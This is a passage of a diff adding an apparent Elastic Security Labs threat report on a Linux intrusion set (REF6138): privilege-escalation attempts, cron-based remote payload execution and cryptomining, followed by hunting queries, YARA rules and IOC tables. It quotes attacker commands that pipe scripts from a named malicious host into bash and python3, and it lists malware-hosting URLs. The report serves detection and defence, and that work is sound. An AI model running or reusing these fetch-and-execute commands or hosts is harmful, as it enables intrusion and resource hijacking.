+The contents of this payload remain unknown. At this stage, we observed attempts at manual privilege escalation, with the attackers deploying `pspy64`. `Pspy` is a command-line tool for process snooping on Linux systems without requiring root permissions. It monitors running processes, including those initiated by other users, and captures events like cron job executions. This tool is particularly useful for analyzing system activity, spotting privilege escalation attempts, and auditing the commands and file system interactions triggered by processes in real time. It's commonly leveraged by attackers for reconnaissance in post-compromise scenarios, giving them visibility into system tasks and potential vulnerabilities​.
+
+Notably, `pspy64` was executed by the `[rcu_preempt]` parent, indicating that the threat actors had transitioned from leveraging the web server backdoor to using the GSOCKET backdoor.
+
+Further attempts at privilege escalation involved exploiting `CVE-2021-4034`, also known as `pwnkit`. This vulnerability affects the `pkexec` component of the PolicyKit package in Linux systems, allowing an unprivileged user to execute arbitrary code with root privileges. By leveraging this flaw, an attacker can gain elevated access to the system, potentially leading to full control over the affected machine.
+
+### Custom built binaries
+
+Right after, the attackers attempted to download a custom-built malware named `apache2` and `apache2v86` from:
+
+* `http://62.72.22[.]91/apache2`
+* `http://62.72.22[.]91/apache2v86`
+
+We obtained copies of these files, which currently have zero detections on VirusTotal. However, when executing them dynamically, we observed segmentation faults, and our telemetry confirmed segfault activity on the compromised host. Over a week, the threat actor attempted to alter, upload and execute these binaries more than 15 times, but due to repeated segfaults, it is unlikely that they succeeded in running this custom malware.
+
+While the binaries failed to execute, they still provided valuable insights during reverse engineering. We uncovered several XOR-encoded strings within the samples.
+
+![Apache2 XOR-Encoded Strings](/assets/images/betting-on-bots/image33.png "Apache2 XOR-Encoded Strings")
+
+The XOR key used to encode the strings was identified as `0x79` (or the character `y`). After decoding the strings, we discovered fragments of an HTTP request header that the malware was attempting to construct:
+
+```
+/934d9091-c90f-4edf-8b18-d44721ba2cdc HTTP/1.1
+sec-ch-ua: "Chromium";v="122", "Google Chrome";v="122", "Not-A.Brand";v="99
+sec-ch-ua-platform: "Windows"
+upgrade-insecure-requests: 1
+accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+referer: https://twitter[.]com
+accept-language: ru,en-US;q=0.9
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.
+```
+
+This indicates that the malware was in the process of constructing HTTP requests. However, based on the incomplete nature of the headers and the repeated failures in execution, it’s clear that this piece of software was not yet fully developed or operational.
+
+### Additional reconnaissance 
+
+The attackers continued to use tools from The Hacker’s Choice, by downloading and executing [`whatserver.sh`](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/whatserver.sh).
+
+This Shell script is designed to gather and display server information. It extracts details such as the fully qualified domain names (FQDNs) from SSL certificates, Nginx, and Apache configuration files, along with system resource information like CPU and memory usage, virtualization details, and network settings. The script can also summarize recent activities, including last logged-in users and currently listening services.
+
+### Mining activities
+
+After nearly two weeks of manual exploitation attempts, the threat actors ceased their efforts to escalate privileges, likely having failed to gain root access. Instead, they established persistence as the `www-data` user, leveraging GSOCKET to set up an SSL connection, which was disguised as a kernel process called `[mm_percpu_wq]`.
+
+After decoding the base64 contents, we get a very familiar looking output:
+
+Through our behavioral rules, we see the threat actor listing the current user’s crontab entries, and echoing a payload directly into the crontab. 
+
+This command tries to download `http://gcp.pagaelrescate[.]com:8080/ifindyou` every minute, and pipe it to bash. Looking at the contents of `ifindyou`, we see the following Bash script:
+
+![Stage 1 - ifindyou.sh](/assets/images/betting-on-bots/image8.png "Stage 1 - ifindyou.sh")
+
+This script gathers hostname and IP information, downloads the `SystemdXC` archive from `http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC` (XMRIG), stores this in `/tmp/SystemdXC`, extracts the archive and executes it with the necessary parameters to start mining Bitcoin.
+
+When examining the mining command, we can see how the malware configures XMRIG:
+
+This command connects to the `unmineable.com` mining pool, using the infected machine’s hostname as an identifier in the mining process. At the time of writing, there are 15 active workers mining Bitcoin for the wallet address `1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz`.
+
+![Bitcoin Address Lookup](/assets/images/betting-on-bots/image1.png "Bitcoin Address Lookup")
+
+Upon further investigation into the Bitcoin address, we found that this address has performed a single transaction.
+
+![Bitcoin Transaction](/assets/images/betting-on-bots/image32.png "Bitcoin Transaction")
+
+Interestingly, the output address for this transaction points to a well-known [hot wallet](https://www.ledger.com/academy/topics/security/hot-wallet-vs-cold-crypto-wallet-whats-the-difference) associated with Binance, indicating that the attackers may have transferred their mining earnings to an exchange platform.
+
+![Binance Wallet Destination](/assets/images/betting-on-bots/image10.png "Binance Wallet Destination")
+
+When returning our focus back to the script, we also see two commands commented out, which will become more clear later. The script executes:
+
+```
+curl -s http://gcp.pagaelrescate[.]com:8080/cycnet | bash
+```
+
+Looking at this payload, we can see the following contents:
+
+![Stage 2 - cycnet.sh](/assets/images/betting-on-bots/image23.png "Stage 2 - cycnet.sh")
+
+This stage checks the output of the command, and sends this to a Telegram chat bot. Through our Telegram behavioral rule, we can see that a Telegram POST request looks like this:
+
+The cron job that is set up during this stage executes at minute 0, every 4th hour. This job executes:
+
+```
+curl -s http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | python3
+```
+
+The downloaded Python script automates interactions with an online gambling game through HTTP requests. The script includes functions that handle user authentication, betting, processing the outcomes, and sending data to a remote server.
+
+Upon closer examination, we identified the following key components of the script:
+
+**Global Variables:**
+
+* `usuario`: Stores the user ID for managing the session.
+* `apuesta`: Represents the bet amount.
+* `ganancias`: Tracks the winnings and losses.
+* `saldo_actual`: Holds the current account balance.
+
+![enviador_slot Global Variables](/assets/images/betting-on-bots/image3.png "enviador_slot Global Variables")
+
+#### Understanding the `obteneruid` Function
+
+This function authenticates the user by sending a POST request with the necessary headers and JSON data to the remote server. If the user is not already set, it initializes a new session and retrieves the account balance. Upon successful authentication, it returns a session UUID, which is used for further interactions in the game.
+
+
+![enviador_slot obteneruid Function](/assets/images/betting-on-bots/image27.png "enviador_slot obteneruid Function")
+
+#### Understanding the `enviardatos` Function
+
+This function sends game data or status updates back to `gcp.pagaelrescate[.]com`, logging the results or actions taken during gameplay. It uses a simple GET request to transmit this data to the remote server.
+
+![enviador_slot enviardatos Function](/assets/images/betting-on-bots/image4.png "enviador_slot enviardatos Function")
+
+#### Understanding the `hacerjugada` Function
+
+The `hacerjugada` function simulates the betting process for a set number of rounds. It sends POST requests to place bets, updates the winnings or losses after each round, and calculates the overall results. If a bonus round is triggered, it calls `completarbono()` to handle any bonus game details. Between each betting round, the function enforces a 30-second delay to mimic natural gameplay and avoid detection.
+
+![enviador_slot hacerjugada Function](/assets/images/betting-on-bots/image28.png "enviador_slot hacerjugada Function")
+
+#### Understanding the `completarbono` Function
+
+When a bonus round is triggered, this function completes the round by sending a request containing the session ID and round ID. Based on the result, it updates the account balance and logs the winnings or losses. Any change in the balance is sent back to the remote server using the `enviardatos()` function.
+
+![enviador_slot completarbono Function](/assets/images/betting-on-bots/image6.png "enviador_slot completarbono Function")
+
+#### Likely Used for Testing Purposes
+
+It’s important to note that this script is likely being used for testing purposes, as it interacts with the demo version of the gambling app. This suggests that the attackers might be testing the automation of gambling actions or trying to find vulnerabilities in the app before moving to the live version. The use of a demo environment implies they are refining their approach, potentially in preparation for more sophisticated or widespread attacks.
+
+## REF6138 through MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks. During this investigation, we identified the following tactics, techniques and sub-techniques:
+
+*MITRE ATT&CK tactics, techniques and sub-techniques used*
+
+| Tactic               | Technique                                          | Sub-Technique                                                                      |
+|----------------------|----------------------------------------------------|------------------------------------------------------------------------------------|
+| Resource Development | T1587: Develop Capabilities                        | Malware                                                                            |
+|                      | T1588: Obtain Capabilities                         | Tool                                                                               |
+|                      | T1608: Stage Capabilities                          | Upload Malware                                                                     |
+|                      |                                                    | Upload Tool                                                                        |
+| Initial Access       | T1190: Exploit Public-Facing Application           |                                                                                    |
+| Execution            | T1059: Command and Scripting Interpreter           | Unix Shell                                                               |
+|             |            | Python                                                               |
+|                      | T1053: Scheduled Task/Job                          | Cron                                                                               |
+| Persistence          | T1546: Event Triggered Execution                   | Unix Shell Configuration Modification                                              |
+|                      | T1053: Scheduled Task/Job                          | Cron                                                                               |
+|                      | T1505: Server Software Component                   | Web Shell                                                                          |
+| Privilege Escalation | T1068: Exploitation for Privilege Escalation       |                                                                                    |
+| Defense Evasion      | T1140: Deobfuscate/Decode Files or Information     |                                                                                    |
+|                      | T1222: File and Directory Permissions Modification | Linux and Mac File and Directory Permissions Modification                          |
+|                      | T1564: Hide Artifacts                              | Hidden Files and Directories                                                       |
+|                      | T1070: Indicator Removal                           | Timestomp                                                                          |
+|                      | T1036: Masquerading                                | Masquerade Task or Service                                                         |
+|                      | T1027: Obfuscated Files or Information             | Software Packing |
+|                      |              | Stripped Payloads |
+|                      |              | Command Obfuscation |
+|                      |              | Encrypted/Encoded File |
+| Discovery            | T1057: Process Discovery                           |                                                                                    |
+|                      | T1082: System Information Discovery                |                                                                                    |
+|                      | T1061: System Network Configuration Discovery      |                                                                                    |
+|                      | T1049: System Network Connections Discovery        |                                                                                    |
+|                      | T1007: System Service Discovery                    |                                                                                    |
+| Collection           | T1119: Automated Collection                        |                                                                                    |
+|                      | T1005: Data from Local System                      |                                                                                    |
+| Command and Control  | T1071: Application Layer Protocol                  | Web Protocols                                                                      |
+|                      | T1132: Data Encoding                               | Standard Encoding                                                                  |
+|                      | T1001: Data Obfuscation                            |                                                                                    |
+|                      | T1573: Encrypted Channel                           | Symmetric Cryptography                                                             |
+|                      | T1105: Ingress Tool Transfer                       |                                                                                    |
+|                      | T1571: Non-Standard Port                           |                                                                                    |
+|                      | T1572: Protocol Tunneling                          |                                                                                    |
+|                      | T1102: Web Service                                 |                                                                                    |
+| Impact               | T1496: Resource Hijacking                          |                                                                                    |
+
+## **Detecting REF6138**
+
+Elastic Security implements a multi-layer approach to threat detection, leveraging behavioral SIEM and Endpoint rules, YARA signatures and ML-based anomaly detection approaches. This section describes the detections built by Elastic Security that play a big role in capturing the identified threats.
+
+### Detection
+
+The following detection rules were observed throughout the analysis of this intrusion set:
+
+* [Segfault Detection](https://github.com/elastic/detection-rules/blob/main/rules_building_block/execution_linux_segfault.toml)
+* [Timestomping using Touch Command](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/defense_evasion_timestomp_touch.toml)
+* [Shell Configuration Creation or Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_shell_configuration_modification.toml)
+* [System Binary Moved or Copied](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml)
+
+### Prevention
+
+The following behavior prevention events were observed throughout the analysis of this intrusion set:
+
+* [Linux Reverse Shell via Suspicious Utility](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_reverse_shell_via_suspicious_utility.toml)
+* [Defense Evasion via Bind Mount](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/defense_evasion_defense_evasion_via_bind_mount.toml)
+* [Linux Suspicious Child Process Execution via Interactive Shell](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_suspicious_child_process_execution_via_interactive_shell.toml)
+* [Potential Linux Hack Tool Launched](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_potential_linux_hack_tool_launched.toml)
+* [Privilege Escalation via PKEXEC Exploitation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/privilege_escalation_privilege_escalation_via_pkexec_exploitation.toml)
+* [Potential SSH-IT SSH Worm Downloaded](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/lateral_movement_potential_ssh_it_ssh_worm_downloaded.toml)
+* [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml)
+
+The following YARA Signatures are in place to detect the KAIJI and RUDEDEVIL malware samples both as file and in-memory:
+
+* [Linux.Generic.Threat](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Generic_Threat.yar)
+* [Linux.Hacktool.Flooder](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Hacktool_Flooder.yar)
+
+The following, soon to be released, endpoint rule alerts were observed throughout the analysis of this intrusion set:
+
+* Potential Shell via Web Server
+* Potential Web Server Code Injection
+* Potential Shell Executed by Web Server User
+* Decode Activity via Web Server
+* Linux Telegram API Request
+* Suspicious Echo Execution
+
+### Hunting queries in Elastic
+
+The events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+#### EQL queries
+
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar:
+
+**Potential XMRIG Execution**
+
+The following EQL query can be used to hunt for XMRIG executions within your environment.
+
+```
+process where event.type == "start" and event.action == "exec" and (
+  (
+    process.args in ("-a", "--algo") and process.args in (
+      "gr", "rx/graft", "cn/upx2", "argon2/chukwav2", "cn/ccx", "kawpow", "rx/keva", "cn-pico/tlo", "rx/sfx", "rx/arq",
+      "rx/0", "argon2/chukwa", "argon2/ninja", "rx/wow", "cn/fast", "cn/rwz", "cn/zls", "cn/double", "cn/r", "cn-pico",
+      "cn/half", "cn/2", "cn/xao", "cn/rto", "cn-heavy/tube", "cn-heavy/xhv", "cn-heavy/0", "cn/1", "cn-lite/1",
+      "cn-lite/0", "cn/0"
+    )
+  ) or
+  (
+    process.args == "--coin" and process.args in ("monero", "arqma", "dero")
+  )
+) and process.args in ("-o", "--url")
+```
+
+**MSR Write Access Enabled**
+
+XMRIG leverages modprobe to enable write access to MSR. This activity is abnormal, and should not occur by-default.
+
+```
+process where event.type == "start" and event.action == "exec" and process.name == "modprobe" and
+process.args == "msr" and process.args == "allow_writes=on"
+```
+
+**Potential GSOCKET Activity**
+
+This activity is default behavior when deploying GSOCKET through the recommended deployment methods. Additionally, several arguments are added to the query to decrease the chances of missing a more customized intrusion through GSOCKET. 
+
+```
+process where event.type == "start" and event.action == "exec" and
+process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and
+process.command_line : (
+"*GS_ARGS=*", "*gs-netcat*", "*gs-sftp*", "*gs-mount*", "*gs-full-pipe*", "*GS_NOINST=*", "*GSOCKET_ARGS=*", "*GS_DSTDIR=*", "*GS_URL_BASE=*", "*GS_OSARCH=*", "*GS_DEBUG=*", "*GS_HIDDEN_NAME=*", "*GS_HOST=*", "*GS_PORT=*", "*GS_TG_TOKEN=*", "*GS_TG_CHATID=*", "*GS_DISCORD_KEY=*", "*GS_WEBHOOK_KEY=*"
+)
+```
+
+**Potential Process Masquerading via Exec**
+
+GSOCKET leverages the `exec -a` method to run a process under a different name. GSOCKET specifically leverages masquerades as kernel processes, but other malware may masquerade differently. 
+
+```
+process where event.type == "start" and event.action == "exec" and
+process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "-c" and process.command_line : "* exec -a *"
+```
+
+**Renice or Ulimit Execution**
+
+Several malwares, including KAIJI and RUDEDEVIL, leverage the renice utility to change the priority of processes or set resource limits for processes. This is commonly used by miner malware to increase the priority of mining processes to maximize the mining performance.
+
+```
+process where event.type == "start" and event.action == "exec" and (
+  process.name in ("ulimit", "renice") or (
+  process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "-c" and
+  process.command_line : ("*ulimit*", "*renice*")
+  )
+)
+```
+
+**Inexistent Cron(d) Service Started**
+
+Both KAIJI and RUDEDEVIL establish persistence through the creation of a `cron(d)` service in `/etc/init.d/cron(d)`. `Cron`, by default, does not use a `SysV Init` service. Execution of a `cron(d)` service is suspicious, and should be analyzed further.
+
+```
+process where event.type == "start" and event.action == "exec" and 
+  process.name == "systemctl" and process.args == "start" and process.args in 
+  ("cron.service", "crond.service", "cron", "crond")
+```
+
+**Suspicious /etc/ Process Execution from KAIJI**
+
+The `/etc/` directory is not a commonly used directory for process executions. KAIJI is known to place a binary called `32678` and `id.services.conf` in the `/etc/` directory, to establish persistence and evade detection.
+
+```
+process where event.type == "start" and event.action == "exec" and (process.executable regex """/etc/[0-9].*""" or process.executable : ("/etc/*.conf", "/etc/.*"))
+```
+
+**Hidden File Creation in /dev/ directory**
+
+Creating hidden files in `/dev/` and `/dev/shm/` are not inherently malicious, however, this activity should be uncommon. KAIJI, GSOCKET and other malwares such as `K4SPREADER` are known to drop hidden files in these locations.
+
+```
+file where event.type == "creation" and file.path : ("/dev/shm/.*", "/dev/.*")
+```
+
+**Suspicious Process Execution from Parent Executable in /boot/**
+
+Malwares such as KAIJI and XORDDOS are known to place executable files in the `/boot/` directory, and leverage these to establish persistence while attempting to evade detection.
+
+```
+process where event.type == "start" and event.action == "exec" and process.parent.executable : "/boot/*"
+```
+
+#### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below is the YARA rule to identify the custom `Apache2` malware:
+
+```
+rule Linux_Trojan_Generic {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-09-20"
+        last_modified = "2024-09-20"
+        os = "Linux"
+        arch = "x86"
+        threat_name = "Linux.Trojan.Generic"
+        reference = "https://www.elastic.co/security-labs/betting-on-bots"
+        license = "Elastic License v2"
+
+    strings:
+        $enc1 = { 74 73 0A 1C 1A 54 1A 11 54 0C 18 43 59 5B 3A 11 0B 16 14 10 0C 14 5B }
+        $enc2 = { 18 1A 1A 1C 09 0D 43 59 0D 1C 01 0D 56 11 0D 14 15 55 18 09 09 15 10 }
+        $enc3 = { 18 1A 1A 1C 09 0D 54 15 18 17 1E 0C 18 1E 1C 43 59 0B 0C }
+        $enc4 = { 34 16 03 10 15 15 18 56 4C 57 49 59 51 2E 10 17 1D 16 0E 0A 59 37 }
+        $key = "yyyyyyyy"
+    condition:
+        1 of ($enc*) and $key
+}
+```
+
+To detect GSOCKET, including several of its adjacent tools, we created the following signature:
+
+```
+rule Multi_Hacktool_Gsocket {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-09-20"
+        last_modified = "2024-09-23"
+        os = "Linux, MacOS"
+        arch = "x86"
+        threat_name = "Multi.Hacktool.Gsocket"
+        reference = "https://www.elastic.co/security-labs/betting-on-bots"
+        license = "Elastic License v2"
+
+    strings:
+        $str1 = "gsocket: gs_funcs not found"
+        $str2 = "/share/gsocket/gs_funcs"
+        $str3 = "$GSOCKET_ARGS"
+        $str4 = "GSOCKET_SECRET"
+        $str5 = "GS_HIJACK_PORTS"
+        $str6 = "sftp -D gs-netcat"
+        $str7 = "GS_NETCAT_BIN"
+        $str8 = "GSOCKET_NO_GREETINGS"
+        $str9 = "GS-NETCAT(1)"
+        $str10 = "GSOCKET_SOCKS_IP"
+        $str11 = "GSOCKET_SOCKS_PORT"
+        $str12 = "gsocket(1)"
+        $str13 = "gs-sftp(1)"
+        $str14 = "gs-mount(1)"
+    condition:
+        3 of them
+}
+```
+
+Finally, the following signature was written to detect the [open source Ligolo-ng tool](https://github.com/nicocha30/ligolo-ng), as we have reason to believe this tool was used during this intrusion.
+
+
+```
+rule Linux_Hacktool_LigoloNG {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-09-20"
+        last_modified = "2024-09-20"
+        os = "Linux"
+        arch = "x86"
+        threat_name = "Linux.Hacktool.LigoloNG"
+        reference = "https://www.elastic.co/security-labs/betting-on-bots"
+        license = "Elastic License v2"
+
+    strings:
+        $a = "https://github.com/nicocha30/ligolo-ng"
+        $b = "@Nicocha30!"
+        $c = "Ligolo-ng %s / %s / %s"
+    condition:
+        all of them
+}
+```
+
+### Defensive recommendations
+
+To effectively defend against malware campaigns and minimize the risk of intrusion, it’s crucial to implement a multi-layered approach to security. Here are some key defensive measures you should prioritize:
+
+1. **Keep Your Elastic Detection Rules Updated and Enabled**: Ensure that your security tools, including any pre-built detection rules, are up to date. Continuous updates allow your systems to detect the latest malware signatures and behaviors.
+2. **Enable Prevention Mode in Elastic Defend**: Configure Elastic Defend in prevention mode to automatically block known threats rather than just alerting on them. Prevention mode ensures proactive defense against malware and exploits.
+3. **Monitor Alerts and Logs**: Regularly monitor alerts, logs, and servers for any signs of suspicious activity. Early detection of unusual behavior can help prevent a small breach from escalating into a full-blown compromise.
+4. **Conduct Threat Hunting**: Proactively investigate your environment for hidden threats that may have evaded detection. Threat hunting can uncover advanced attacks and persistent malware that bypass traditional security measures.
+5. **Implement Web Application Firewalls (WAFs)**: Use a WAF to block unauthorized or malicious traffic. A properly configured firewall can prevent many common web attacks.
+6. **Enforce Strong Authentication for SSH**: Use public/private key authentication for SSH access to protect against brute force attacks.
+7. **Write Secure Code**: Ensure that all custom software, especially web server technology, follows secure coding practices. Engaging professional security auditors to review your code can help identify and mitigate vulnerabilities before they are exploited.
+8. **Regularly Patch and Update Systems**: Keeping servers, applications, and software up to date is essential to defending against known vulnerabilities. Prompt patching minimizes the risk of being targeted by off-the-shelf exploits.
+
+By following these recommendations, you can significantly reduce the attack surface and strengthen your defense against ongoing or potential malware threats.
+
+## Observations
+
+The following observables were discussed in this research. These are available for download in STIX or ECS format [here](https://github.com/elastic/labs-releases/tree/main/indicators/ref6138).
+
+| Observable                                                                                      | Type        | Name                   | Reference                          |
+|-------------------------------------------------------------------------------------------------|-------------|------------------------|------------------------------------|
+| 72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f                                | SHA-256     | SystemdXC              | XMRIG                              |
+| 82c55c169b6cb5e348be6e202163296b2b5d80fff2be791c21da9a8b84188684                                | SHA-256     | apache2                | apache2_unpacked                   |
+| 0fede7231267afc03b096ee6c1d3ded479b10ab235e260120bc9f68dd1fc54dd                                | SHA-256     | apache2_upx_packed     | apache2_upx_packed                 |
+| 9ee695e55907a99f097c4c0ad4eb24ae5cf3f8215e9904d787817f1becb9449e                                | SHA-256     | download.sh            | KAIJI Stager                       |
+| 1cdfb522acb1ad0745a4b88f072e40bf9aa113b63030fe002728bac50a46ae79                                | SHA-256     | linux_386              | KAIJI x86                          |
+| d0ef2f020082556884361914114429ed82611ef8de09d878431745ccd07c06d8                                | SHA-256     | linux_amd64            | KAIJI x64                          |
+| ad36cf59b5eb08799a50e9aece6f12cdfe8620062606ac6684d3b4509acc681b                                | SHA-256     | linux_arm5             | KAIJI ARM5                         |
+| 792a84a5bc8530285e2f6eb997054edb3d43460a99a089468e2cf81b5fd5cde6                                | SHA-256     | linux_arm6             | KAIJI ARM6                         |
+| e19fb249db323d2388e91f92ff0c8a7a169caf34c3bdaf4d3544ce6bfb8b88b4                                | SHA-256     | linux_arm64            | KAIJI ARM64                        |
+| 3847c06f95dd92ec482212116408286986bb4b711e27def446fb4a524611b745                                | SHA-256     | linux_arm7             | KAIJI ARM7                         |
+| fffee23324813743b8660282ccd745daa6fb058f2bf84b9960f70d888cd33ba0                                | SHA-256     | linux_mips             | KAIJI MIPS                         |
+| 6d40b58e97c7b4c34f7b5bdac88f46e943e25faa887e0e6ce5f2855008e83f55                                | SHA-256     | linux_mips64           | KAIJI MIPS64                       |
+| 0c3442b8c49844a1ee41705a9e4a710ae3c7cde76c69c2eab733366b2aa34814                                | SHA-256     | linux_mips64el         | KAIJI MIPS64 little-endian         |
+| 310973f6f186947cb7cff0e7b46b4645acdd71e90104f334caa88a4fa8ad9988                                | SHA-256     | linux_mips_softfloat   | KAIJI MIPS softfloat               |
+| 0d24a2e7da52bad03b0bda45c8435a29c4e1c9b483e425ae71b79fd122598527                                | SHA-256     | linux_mipsel           | KAIJI MIPS little-endian           |
+| 36fc8eef2e1574e00ba3cf9e2267d4d295f6e9f138474e3bd85eb4d215f63196                                | SHA-256     | linux_mipsel_softfloat | KAIJI MIPS little-endian softfloat |
+| 3c25a4406787cc5089e83e00350e49eb9f192d03d69e7a61b780b6828db1344f                                | SHA-256     | linux_ppc64            | KAIJI PPC64                        |
+| 7c16149db7766c6fd89f28031aa123408228f045e90aa03828c02562d9f9d1d7                                | SHA-256     | linux_ppc64el          | KAIJI PPC64 little-endian          |
+| 09f935acbac36d224acfb809ad82c475d53d74ab505f057f5ac40611d7c3dbe7                                | SHA-256     | l64_v0                 | RUDEDEVIL/LUFICER x64 version 0    |
+| ea0068702ea65725700b1dad73affe68cf29705c826d12a497dccf92d3cded46                                | SHA-256     | l64_v1                 | RUDEDEVIL/LUFICER x64 version 1    |
+| 160f232566968ade54ee875def81fc4ca69e5507faae0fceb5bef6139346496a                                | SHA-256     | l64_v2                 | RUDEDEVIL/LUFICER x64 version 2    |
+| 89b60cedc3a4efb02ceaf629d6675ec9541addae4689489f3ab8ec7741ec8055                                | SHA-256     | l64_v3                 | RUDEDEVIL/LUFICER x64 version 3    |
+| 20899c5e2ecd94b9e0a8d1af0114332c408fb65a6eb3837d4afee000b2a0941b                                | SHA-256     | l86_v0                 | RUDEDEVIL/LUFICER x86 version 0    |
+| 728dce11ffd7eb35f80553d0b2bc82191fe9ff8f0d0750fcca04d0e77d5be28c                                | SHA-256     | l86_v1                 | RUDEDEVIL/LUFICER x86 version 1    |
+| 47ceca049bfcb894c9a229e7234e8146d8aeda6edd1629bc4822ab826b5b9a40                                | SHA-256     | l86_v2                 | RUDEDEVIL/LUFICER x86 version 2    |
+| e89f4073490e48aa03ec0256d0bfa6cf9c9ac6feb271a23cb6bc571170d1bcb5                                | SHA-256     | l86_v3                 | RUDEDEVIL/LUFICER x86 version 3    |
+| d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60                                | SHA-256     | hjvhg.exe              | Miner                              |
+| 54a5c82e4c68c399f56f0af6bde9fb797122239f0ebb8bcdb302e7c4fb02e1de                                | SHA-256     | mvhhvcp3.exe           | DONUT LOADER                       |
+| 9e32be17b25d3a6c00ebbfd03114a0947361b4eaf4b0e9d6349cbb95350bf976                                | SHA-256     | vdfgb.exe              | Miner                              |
+| http://gcp.pagaelrescate[.]com:8080/ifindyou                                                    | url         | ifindyou.sh            | Stage 1                            |
+| http://gcp.pagaelrescate[.]com:8080/cycnet                                                      | url         | cycnet.sh              | Stage 2                            |
+| http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot                                      | url         | Enviador_slot.py       | Stage 3                            |
+| http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC                                               | url         | SystemdXC              | XMRIG                              |
+| http://38.54.125[.]192:8080/nginx-rc                                                            | url         | nginx-rc               | LIGOLO-NG                          |
+| http://62.72.22[.]91/apache2                                                                    | url         | apache2                | Custom Malware                     |
+| http://62.72.22[.]91/apache2v86                                                                 | url         | apache2v86             | Custom Malware                     |
+| http://91.92.241[.]103:8002/gk.php                                                              | url         | gk.php                 | PHP Backdoor                       |
+| http://hfs.t1linux[.]com:7845/scdsshfk                                                          | url         | scdsshfk               | XMRIG                              |
+| gcp.pagaelrescate[.]com                                                                         | domain-name |                        | REF Hosting domain                 |
+| nishabii[.]xyz                                                                                  | domain-name |                        | RUDEDEVIL C2                       |
+| 3.147.53[.]183                                                                                  | ipv4-addr   |                        | Python Reverse Shell C2            |
+| 38.54.125[.]192                                                                                 | ipv4-addr   |                        | C2 Server                          |
+| 107.178.101[.]245                                                                               | ipv4-addr   |                        | Malware File Server (Rejetto)      |
+| 62.72.22[.]91                                                                                   | ipv4-addr   |                        | Server Hosting Malware             |
+| 91.92.241[.]103                                                                                 | ipv4-addr   |                        | C2 Server                          |
+| 61.160.194[.]160                                                                                | ipv4-addr   |                        | Server Hosting Malware             |
+| 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL | XMR Wallet  |                        | RUDEDEVIL/LUFICER mining wallet    |
+| 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc | XMR Wallet  |                        | RUDEDEVIL/LUFICER mining wallet    |
+| 1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz                                                              | BTC Wallet  |                        | XMRIG mining wallet                |
+
+## References
+
+The following were referenced throughout the above research:
+
+* [https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html](https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html)
+* [https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/)
+* [https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities](https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities)
+* [https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/](https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/)
+* [https://github.com/hackerschoice/gsocket](https://github.com/hackerschoice/gsocket)
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/beyond_the_wail.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/beyond_the_wail.md
new file mode 100644
index 0000000000000..748a0c63390d6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/beyond_the_wail.md
@@ -0,0 +1,187 @@
+---
+title: "Beyond the wail: deconstructing the BANSHEE infostealer"
+slug: "beyond-the-wail"
+date: "2024-08-15"
